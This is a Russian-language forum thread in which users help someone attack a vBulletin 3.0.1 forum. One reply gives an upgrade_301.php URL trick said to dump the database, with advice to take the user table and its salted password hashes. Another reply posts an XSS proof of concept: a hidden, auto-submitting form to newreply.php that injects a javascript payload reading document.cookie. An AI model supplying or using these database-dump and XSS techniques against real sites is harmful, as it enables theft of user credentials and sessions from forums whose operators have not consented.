Вопрос про уязвимости в vbulletin 3.0.1
 

Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
Спасиб ;)

скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз

www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
Возможность сделать дамп базы.
Относительно стабильно работает на 3.0.1.

*либо www.forum.site.domen либо www.site.domen/forum/...
Попробуй.
Хеши - солёные. Соль - последния столбец таблицы.
Если покатит - советую делать дамп таблицы user (мэйби vb_user)
Будет проще, меньше размером, да и нах тебе остальное?

Ща попробую! Спасибо за инфу! ++

Эх жалко. Действительно 3.0.1 мулька. =(

а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"

а есть тут еще уязвимости??

где тут? в этой версии?

Программа: vBulletin 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

и че с этим делать?

На хер намотай...